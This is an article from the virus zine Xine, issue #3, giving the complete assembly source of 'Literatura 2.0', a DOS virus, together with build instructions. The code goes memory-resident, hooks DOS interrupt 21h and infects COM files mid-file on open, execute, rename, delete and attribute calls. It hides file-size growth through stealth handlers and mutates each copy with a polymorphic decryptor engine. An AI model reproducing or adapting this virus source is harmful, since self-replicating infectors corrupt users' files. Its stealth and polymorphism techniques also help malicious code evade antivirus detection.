Xine - issue #3 - Phile 208
/-----------------------------\
| Xine - issue #3 - Phile 208 |
\-----------------------------/
Comment %
Ü
Û Û V I R U S Û
Û ßÜÛÜ ÜÜ Ü Ü ÜÜ ÜÛÜ Ü Ü ÜÜ
Û Û Û ÛÜÜß Ûß Û Û Û Û Û Ûß Û Û ÜßßÜ ÜßßÜ
Û Û Û Û Û Û Û Û Û Û Û Û Û Üß Û Û
ßßß ß ß ßßß ß ßßßß ß ßß ß ßßßß ßßß ß ßß
TSR size stealth polymorphic COM midfile fast infector
Programmed by Int13h/iKx in Paraguay, South America
Original bytes of the host are stored in an encrypted form at EOF.
Virus code is in a random file position, a polymorphic header gives
control to the decryptor generated by the polymorphic engine.
Greets to Dark Avenger, who was the pioneer in midfile infection,
with his great Commander Bomber. Also greetz to all my IRC-friends.
tasm litera2 /m3
tlink litera2 /t
%
.Model Tiny
.Code
Org 100h
Jumps
Heap equ (offset Final-offset OpaLaVya)
Largor equ (offset OpaLaVya-offset Literatura)
Parrafos1 equ ((Largor+Heap+15)/16)+1
Parrafos2 equ ((Largor+Heap+15)/16)
LDecryptor equ (offset encriptora_1-offset instruccion_2)
LITERATURA:
Basura db 33d dup(090h) ; Space where we will generate
Modificar: ; the polymorphic decryptor
int 3
call Delta
Delta: pop bp
sub bp,offset Delta
mov ax,'i1'
int 21h
cmp ax,'3!'
je LiteraturaIsAlreadySuckingMemory
mov ah,30h
int 21h
cmp al,7
jae LiteraturaIsAlreadySuckingMemory
mov ax,3521h
int 21h
mov word ptr [bp+Vieja21h],bx
mov word ptr [bp+Vieja21h+2],es
mov ax,ds
dec ax
mov es,ax
mov ax,es:[3]
sub ax,Parrafos1
xchg bx,ax
push ds
pop es
mov ah,4ah
int 21h
mov ah,48h
mov bx,Parrafos2
int 21h
dec ax
mov es,ax
mov word ptr es:[1],8
inc ax
mov es,ax
xor di,di
push cs
pop ds
lea si,[bp+offset Literatura]
mov cx,Largor
rep movsb
push es
pop ds
mov ax,2521h
mov dx,(offset Literatura21h-100h)
int 21h
LiteraturaIsAlreadySuckingMemory:
push cs cs
pop ds es
cld
lea si,[bp+offset Primitivos]
mov di,100h
push di
mov cx,15
rep movsw
lea si,[bp+offset Copier]
mov di,06ch
mov ax,di
mov cx,5
repe movsw
movsb
db 0bfh
Reales dw 0
add di,100h
mov cx,Largor
Descifrar_Bytes_Originales:
dw 3580h
Llave db 0
inc di
loop Descifrar_Bytes_Originales
mov cx,Largor
db 0beh
Origen dw 0
add si,100h
db 0bfh
Destino dw 0
add di,100h
xor bx,bx
xor dx,dx
sub bp,bp
jmp ax
Copier: repe movsb
xor si,si
sub di,di
xor ax,ax
sub cx,cx
ret
db " [LiTeRaTuRa 2.0 by Int13h] - MadE in ParaguaY "
Metodo1:db 0e9h
Despla1 dw 666
Metodo2:db 0bbh
Despla2 dw 666
push bx
ret
Metodo3:db 0e8h
Despla3 dw 666
Metodo4:db 0bbh
Despla4 dw 666
jmp bx
Metodo5:db 0bbh
Despla5 dw 666
call bx
Metodo6:push cs
db 0bbh
Despla6 dw 666
push bx
retf
STEALTH1:
xor ah,0bah
pushf
call dword ptr cs:[Vieja21h-100h]
test al,al
jnz Erebo
push ax bx es
mov ah,51h
int 21h
mov es,bx
cmp bx,es:[16h]
jne Fuera
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh
int 21h
pop ax
inc al
jnz FCBComun
add bx,7
FCBComun:
mov al,byte ptr es:[bx+17h]
and al,00011111b
cmp al,00011110b
jne Fuera
cmp word ptr es:[bx+1dh],Largor
ja Sustraer
cmp word ptr es:[bx+1fh],0
je Fuera
Sustraer:sub word ptr es:[bx+1dh],Largor
Fuera: pop es bx ax
Erebo: retf 2
LITERATURA21h:
cmp ax,'i1' ; Residence Checking
je Chequeo
xor ah,0bah
cmp ah,(03dh xor 0bah) ; File Opening?
je InfectFile
cmp ah,(04bh xor 0bah) ; Program loading?
je InfectFile
cmp ah,(11h xor 0bah) ; FCB find first
je Stealth1
cmp ah,(12h xor 0bah) ; FCB find next
je Stealth1
cmp ah,(4eh xor 0bah) ; DTA find first
je Stealth2
cmp ah,(4fh xor 0bah) ; DTA find next
je Stealth2
cmp ax,0d600h ; Extended Open
je InfectFile
cmp ah,(056h xor 0bah) ; Rename
je InfectFile
cmp ah,(041h xor 0bah) ; Delete
je InfectFile
cmp ah,(043h xor 0bah) ; Get/Set attributes
je InfectFile
cmp ax,08f21h ; Camuflar 3521h
je Ocultar21h_A
cmp ax,09f21h ; Camuflar 2521h
je Ocultar21h_B
xor ah,0bah
Interrupcion_21h:
db 0eah
Vieja21h dd 0
Chequeo:mov ax,'3!'
iret
OCULTAR21h_A:
xor ah,0bah
mov bx,word ptr cs:[(Vieja21h-100h)]
mov es,word ptr cs:[(Vieja21h-100h)+2]
iret
OCULTAR21h_B:
xor ah,0bah
mov word ptr cs:[(Vieja21h-100h)],dx
mov word ptr cs:[(Vieja21h-100h)+2],ds
iret
STEALTH2:
xor ah,0bah
pushf
call dword ptr cs:[Vieja21h-100h]
jc Infierno
pushf
push ax di es bx
mov ah,2fh
int 21h
mov ax,es:[bx+16h]
and al,00011111b
cmp al,00011110b
jne Paso
cmp word ptr es:[bx+1ah],Largor
jb Paso
sub word ptr es:[bx+1ah],Largor
Paso: pop bx es di ax
popf
Infierno:
retf 2
Primitivos db 30d dup(0c3h)
SoloPopear:
jmp PopIt
INFECTFILE:
xor ah,0bah
push ax bx cx dx si di ds es
cmp ax,6c00h
jne Apertura_Standard
cmp dx,0001
jne SoloPopear
mov dx,si
Apertura_Standard:
push dx ds
mov ax,3524h
int 21h
mov word ptr cs:[Real24h-100h],bx
mov word ptr cs:[(Real24h-100h)+2],es
push cs
pop ds
mov ax,2524h
mov dx,offset Handler24h-100h
int 21h
pop ds dx
push ds
pop es
cld
mov di,dx
mov cx,128
mov al,'.'
repne scasb
jne Popeo
mov ax,word ptr es:[di-3]
or ax,02020h
cmp ax,'dn'
je Popeo
xchg si,di
lodsw
or ax,2020h
cmp ax,'oc'
jne Popeo
lodsb
or al,20h
cmp al,'m'
jne Popeo
mov ax,3d02h
pushf
call dword ptr cs:[Vieja21h-100h]
jc Popeo
xchg bx,ax
mov ax,5700h
int 21h
mov word ptr cs:[(Hora-100h)],cx
mov word ptr cs:[(Fecha-100h)],dx
and cl,00011111b
cmp cl,00011110b
je Closeo
push cs cs
pop ds es
mov ah,03fh
mov dx,(offset Primitivos-100h)
mov cx,30
int 21h
mov si,dx
mov ax,[si]
add ah,al
cmp ah,167d
je Closeo
call PunteroFin
and dx,dx
jnz Closeo
cmp ax,60000d
ja Closeo
cmp ax,3000d
jbe Closeo
mov cx,ax
sub cx,(Largor+40)
call Obtener_Numero_Aleatorio
cmp ax,40
ja Okis
mov ax,666
Okis: sub ax,3
mov word ptr [Despla1-100h],ax
mov word ptr [Despla2-100h],ax
mov word ptr [Despla3-100h],ax
mov word ptr [Despla4-100h],ax
mov word ptr [Despla5-100h],ax
mov word ptr [Despla6-100h],ax
add ax,3
mov dx,ax
push dx
mov word ptr [Destino-100h],dx
xor cx,cx
mov ax,4200h
int 21h
mov ah,3fh
mov dx,offset Vafer-100h
mov cx,Largor
int 21h
call PunteroFin
mov word ptr [Reales-100h],ax
mov word ptr [Origen-100h],ax
in al,40h
or al,al
jnz NoCero
inc al
NoCero: mov byte ptr [Llave-100h],al
mov si,offset Vafer-100h
mov cx,Largor
Cifrar_Bytes_Originales:
xor byte ptr [si],al
inc si
loop Cifrar_Bytes_Originales
mov ah,40h
mov cx,Largor
mov dx,offset Vafer-100h
int 21h
call PunteroInicio
mov di,(offset Polymorphic_Header-100h)
mov cx,30
Generate_Garbage:
push cx
push di
mov cx,40
call Obtener_Numero_Aleatorio
mov si,(offset Opcodes_de_un_byte-100h)
add si,ax
pop di
movsb
pop cx
loop Generate_Garbage
mov cx,7
call Obtener_Numero_Aleatorio
call Generate_Polymorphic_Header
mov ah,40h
mov cx,30
mov dx,(offset Polymorphic_Header-100h)
int 21h
pop dx
push dx
xor cx,cx
mov ax,4200h
int 21h
mov si,offset Modificar-100h
mov di,offset Vafer-100h
mov cx,Largor-33d
pop bp
add bp,100h
push bx
call Ygramul
pop bx
mov ah,40h
mov dx,offset Vafer-100h
int 21h
db 0b9h
Hora dw 0
and cl,11100000b
or cl,00011110b
db 0bah
Fecha dw 0
mov ax,5701h
int 21h
Closeo: mov ah,3eh
int 21h
Popeo: push cs
pop ds
lds dword ptr dx,[Real24h-100h]
mov ax,2524h
int 21h
PopIt: pop es ds di si dx cx bx ax
jmp Interrupcion_21h
PunteroInicio:
mov ax,04200h
jmp short Mover
PunteroFin:
mov ax,04202h
Mover: xor cx,cx
cwd
int 21h
ret
Handler24h:
mov al,03
iret
Generate_Polymorphic_Header:
mov byte ptr [Modificar-100h],0cch
cmp ax,2
je UsarMetodo2
cmp ax,3
je UsarMetodo3
cmp ax,4
je UsarMetodo4
cmp ax,5
je UsarMetodo5
cmp ax,6
je UsarMetodo6
call Arreglo_General
mov si,offset Metodo1-100h
movsw
movsb
ret
UsarMetodo2:
call Arreglo_General
mov si,offset Metodo2-100h
movsw
movsw
movsb
ret
UsarMetodo3:
call Arreglo_General
mov byte ptr [Modificar-100h],05dh
mov si,offset Metodo3-100h
movsw
movsb
ret
UsarMetodo4:
call Arreglo_General
mov si,offset Metodo4-100h
movsw
movsw
movsb
ret
UsarMetodo5:
call Arreglo_General
mov byte ptr [Modificar-100h],058h
mov si,offset Metodo5-100h
movsw
movsw
movsb
ret
UsarMetodo6:
call Arreglo_General
mov si,offset Metodo6-100h
movsw
movsw
movsw
ret
Arreglo_General:
mov cx,23
call Obtener_Numero_Aleatorio
sub word ptr [Despla1-100h],ax
add word ptr [Despla2-100h],103h
sub word ptr [Despla3-100h],ax
add word ptr [Despla4-100h],103h
add word ptr [Despla5-100h],103h
add word ptr [Despla6-100h],103h
mov di,offset Polymorphic_Header-100h
add di,ax
ret
; Cheesy engine used to generate random fixed-size decryptors
; Uses xor/sub/add/not/neg/ror/rol/inc/dec for enc/decryption
Ygramul:
mov word ptr [LiteCX1-100h],cx
mov word ptr [LiteCX2-100h],cx
mov word ptr [LiteBP-100h],bp
mov word ptr [LiteES-100h],es
mov word ptr [LiteSI-100h],si
mov word ptr [LiteDI-100h],di
mov si,offset ClaveEnc_1-100h
mov di,offset ClaveDec_1-100h
in ax,40h
test al,al
jnz Pasamos_al
inc al
Pasamos_al:
and ah,ah
jnz Pasamos_ah
dec ah
Pasamos_ah:
mov byte ptr [si+3],ah
mov byte ptr [di+3],ah
mov byte ptr [si],al
mov byte ptr [di],al
in al,40h
or al,al
jnz Listo
inc al
Listo: mov byte ptr [si+6],al
mov byte ptr [di+6],al
push cs
pop es
mov di,offset Encriptora_4-100h+2
mov bx,offset Opcodes_de_un_byte-100h
mov si,6
Rellenar:
mov cx,17
call Obtener_Numero_Aleatorio
xlat
stosb
inc di
inc di
dec si
jnz Rellenar
mov cx,127
call obtener_numero_aleatorio
sub word ptr [LiteBP-100h],ax
mov byte ptr [Desplazamiento1-100h],al
mov byte ptr [Desplazamiento2-100h],al
mov cx,4
call Obtener_Numero_Aleatorio
mov byte ptr [Indice-100h],al
mov si,offset Instruccion_2-100h
mov di,offset Instruccion_3-100h+2
mov bp,offset Instruccion_4-100h
cmp al,1
jnz No_fue_Uno
mov byte ptr [si],0beh
mov byte ptr [di],07ch
mov byte ptr ds:[bp+2],07ch
mov byte ptr ds:[bp+4],046h
jmp short Seleccionar_Contador
No_fue_Uno:
cmp al,2
jnz No_fue_Dos
mov byte ptr [si],0bfh
mov byte ptr [di],07dh
mov byte ptr ds:[bp+2],07dh
mov byte ptr ds:[bp+4],047h
jmp short Seleccionar_Contador
No_fue_Dos:
cmp al,3
jnz Fue_Cuatro
mov byte ptr [si],0bdh
mov byte ptr [di],07eh
mov byte ptr ds:[bp+2],07eh
mov byte ptr ds:[bp+4],045h
jmp short Seleccionar_Contador
Fue_Cuatro:
mov byte ptr [si],0bbh
mov byte ptr [di],07fh
mov byte ptr ds:[bp+2],07fh
mov byte ptr ds:[bp+4],043h
Seleccionar_Contador:
mov cx,6
call Obtener_Numero_Aleatorio
mov ah,byte ptr [Indice-100h]
cmp ah,al
je Seleccionar_Contador
mov byte ptr [Contador-100h],al
mov si,offset Instruccion_1-100h
mov di,offset Instruccion_6-100h
cmp al,1
jnz Uno_no_fue
mov byte ptr [si],0beh
mov byte ptr [di],04eh
jmp short Mutar_registros_de_trabajo
Uno_no_fue:
cmp al,2
jne Dos_no_fue
mov byte ptr [si],0bfh
mov byte ptr [di],04fh
jmp short Mutar_registros_de_trabajo
Dos_no_fue:
cmp al,3
jne Tres_no_fue
mov byte ptr [si],0bdh
mov byte ptr [di],04dh
jmp short Mutar_registros_de_trabajo
Tres_no_fue:
cmp al,4
jne Cuatro_no_fue
mov byte ptr [si],0bbh
mov byte ptr [di],04bh
jmp short Mutar_registros_de_trabajo
Cuatro_no_fue:
cmp al,5
jne Seis_fue
mov byte ptr [si],0b9h
mov byte ptr [di],049h
jmp short Mutar_registros_de_trabajo
Seis_fue:
mov byte ptr [si],0bah
mov byte ptr [di],04ah
Mutar_registros_de_Trabajo:
mov cx,6
call Obtener_Numero_Aleatorio
mov byte ptr [Carga-100h],al
mov cl,byte ptr [Indice-100h]
mov ch,byte ptr [Contador-100h]
cmp al,2
ja No_CX
cmp ch,5
je Mutar_registros_de_Trabajo
jmp short Almacenar
No_CX: cmp al,4
ja No_DX
cmp ch,6
je Mutar_registros_de_Trabajo
jmp short Almacenar
No_DX: cmp cl,4
je Mutar_registros_de_Trabajo
cmp ch,4
je Mutar_registros_de_Trabajo
Almacenar:
and byte ptr [Instruccion_3-100h+2],047h
and byte ptr [Instruccion_4-100h+2],047h
cmp al,1
jnz Uno_no_ha_sido
mov al,00101000b
jmp short ORearlo
Uno_no_ha_sido:
cmp al,2
jne Dos_no_ha_sido
mov al,00001000b
jmp short ORearlo
Dos_no_ha_sido:
cmp al,3
jne Tres_no_ha_sido
mov al,00110000b
jmp short ORearlo
Tres_no_ha_sido:
cmp al,4
jne Cuatro_no_ha_sido
mov al,00010000b
jmp short ORearlo
Cuatro_no_ha_sido:
cmp al,5
jne Fue_Six
mov al,00111000b
jmp short ORearlo
Fue_Six:mov al,00011000b
ORearlo:mov byte ptr [Orear-100h],al
or byte ptr [Instruccion_3-100h+2],al
or byte ptr [Instruccion_4-100h+2],al
mov di,offset Encriptar-100h
mov ax,15
call Llenar_con_basura
mov di,offset Buffer-100h
mov ax,15
call Llenar_con_basura
mov cx,5
call Obtener_Numero_Aleatorio
mov byte ptr [Cantidad-100h],al
mov bp,ax
mov di,offset Encriptar-100h
xor dx,dx
Seleccionar_Instrucciones:
mov si,offset Encriptora_1-100h-3
mov cx,9
call Obtener_Numero_Aleatorio
mov cl,3
mul cl
add si,ax
movsw
movsb
push si
push di
add si,24
mov di,offset Buffer-100h
add di,dx
add dx,3
movsw
movsb
pop di
pop si
dec bp
jnz Seleccionar_Instrucciones
mov bp,3
mov si,offset Encriptar-100h
mov cx,5
Inversor:
mov di,offset Instruccion_4-100h
sub di,bp
add bp,3
movsw
movsb
loop Inversor
mov si,offset Buffer-100h
mov di,offset Encriptar-100h
mov cx,15
rep movsb
mov si,offset Instruccion_4-100h-2
mov al,byte ptr [Orear-100h]
mov cl,3
shr al,cl
xor cx,cx
mov cl,byte ptr [Cantidad-100h]
Proceder:
and byte ptr [si],11111000b
or byte ptr [si],al
sub si,3
loop Proceder
db 0bfh
LiteDI dw 0
db 0b8h
LiteES dw 0
mov es,ax
db 0bah
LiteCX1 dw 0
mov cx,LDecryptor
add word ptr [LiteBP-100h],cx
push cx
mov si,offset Instruccion_2-100h
rep movsb
pop cx
add cx,dx
db 0beh
LiteSI dw 0
Realizar_la_encripcion:
mov bh,byte ptr ds:[si]
Encriptar db 15 dup(0fbh)
mov byte ptr es:[di],bh
inc si
inc di
dec dx
jnz Realizar_la_encripcion
ret
Instruccion_2: db 0beh
LiteBP dw 0
Instruccion_1: db 0bah
LiteCX2 dw 0
Instruccion_3: db 02eh,08ah,07ch
Desplazamiento1 db 0
Desencriptar db 15 dup(0f8h)
Instruccion_4: db 02eh,088h,07ch
Desplazamiento2 db 0
Instruccion_5: inc si
Instruccion_6: dec dx
jnz Instruccion_3
Encriptora_1: db 080h,0c7h
ClaveEnc_1 db 0
Encriptora_2: db 080h,0efh
ClaveEnc_2 db 0
Encriptora_3: db 080h,0f7h
ClaveEnc_3 db 0
Encriptora_4: inc bh
int 3
Encriptora_5: dec bh
sti
Encriptora_6: not bh
stc
Encriptora_7: neg bh
cld
Encriptora_8: ror bh,1
cmc
Encriptora_9: rol bh,1
nop
Desencriptora_1: db 080h,0efh
ClaveDec_1 db 0
Desencriptora_2: db 080h,0c7h
ClaveDec_2 db 0
Desencriptora_3: db 080h,0f7h
ClaveDec_3 db 0
Desencriptora_4: dec bh
nop
Desencriptora_5: inc bh
stc
Desencriptora_6: not bh
clc
Desencriptora_7: neg bh
sti
Desencriptora_8: rol bh,1
cmc
Desencriptora_9: ror bh,1
Opcodes_de_un_byte:
cld
db 090h,0cch,0fch,0fbh,0f8h,0f9h,0f5h,037h,02fh,027h
db 03fh,0ceh,098h,09fh,09bh,040h,048h,043h,04bh,041h
db 049h,042h,04ah,046h,04eh,047h,04fh,045h,04dh,093h
db 099h,091h,092h,095h,096h,097h,0ech,0edh,0d7h
Obtener_Numero_Aleatorio:
push dx
push di
in ax,40h
mov dx,106
mul dx
add ax,1283
mov di,6075
adc dx,0
div di
mov ax,dx
mul cx
div di
pop di
pop dx
inc ax
ret
Llenar_con_basura:
mov bp,ax
Repetir:mov si,offset Opcodes_de_un_byte-100h
mov cx,17
call Obtener_Numero_Aleatorio
add si,ax
movsb
dec bp
jnz Repetir
ret
Cantidad db 0
Orear db 0
Buffer:
Indice db 0
Contador db 0
Carga db 0
db 13 dup(90h)
OpaLaVya:
Real24h dd 0
Polymorphic_Header db 30 dup(0)
Vafer db Largor dup(0)
Final label byte
End LITERATURA